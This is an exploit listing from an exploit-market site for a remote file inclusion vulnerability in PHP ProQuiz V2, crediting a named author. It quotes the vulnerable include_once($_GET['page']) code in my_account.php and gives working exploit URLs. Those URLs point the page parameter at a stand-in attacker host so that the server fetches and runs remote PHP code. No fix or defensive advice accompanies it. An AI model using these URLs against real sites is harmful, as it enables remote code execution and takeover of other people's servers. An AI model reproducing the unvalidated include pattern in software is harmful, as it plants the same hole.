[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP ProQuiz V2 Remote File Inclusion

Author
Adel SBM
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19173
Category
web applications
Date add
11-08-2012
Platform
php
+------------------------------------------------------------------+
+ PHP ProQuiz V2 Remote file Inclusion                             +
+------------------------------------------------------------------+
   
Web-App        : PHP ProQuiz V2
Vendor         : http://www.advphp.com
Vulnerability  : Remote file Inclusion
Author         : Adel SBM
Facebook       : http://www.facebook.com/adel.sbm
Websites       : [www.The-code.tk]-[www.dz-root.com]-[www.sec4ever.com]
Tested on      : Windows XP SP2
Risk-level     : High
SCREENSHOT     : http://imgtk.tk/?img=171344610821.png
 
                          
+-------------------------------------------------------------------+
+                         Algeria                                   +
+                        01/08/2012                                 +
+-------------------------------------------------------------------+
 
    [-] vulnerable code in "my_account.php"
     
                    
                         if($_GET['action']=='getpage' && !empty($_GET['page'])){ 
                             @include_once($_GET['page'].'.php');  
                         }else{ 
                             echo getContents($db,'my_panel'); 
                         } 
                   ?
 
    [-] An attacker might include local or remote PHP files or read files through $_GET['page'] ..
 
     
     
==================================================================================================
================================= FIRST YOU MUST REGISTER=========================================
==================================================================================================
 
--------------------   
EXPLOIT:
--------------------
http://localhost/train/my_account.php?action=getpage&page=http://www.evilcode.com/evilcode.txt?
 
Or:
 
http://localhost/train/my_account.php?action=getpage&page=http://www.evilcode.com/evilcode
 
--------------------
EXAMPLE (Localhost):
--------------------
http://localhost/train/my_account.php?action=getpage&page=http://www.evilcode.com/evilcode.txt?



#  0day.today [2024-12-26]  #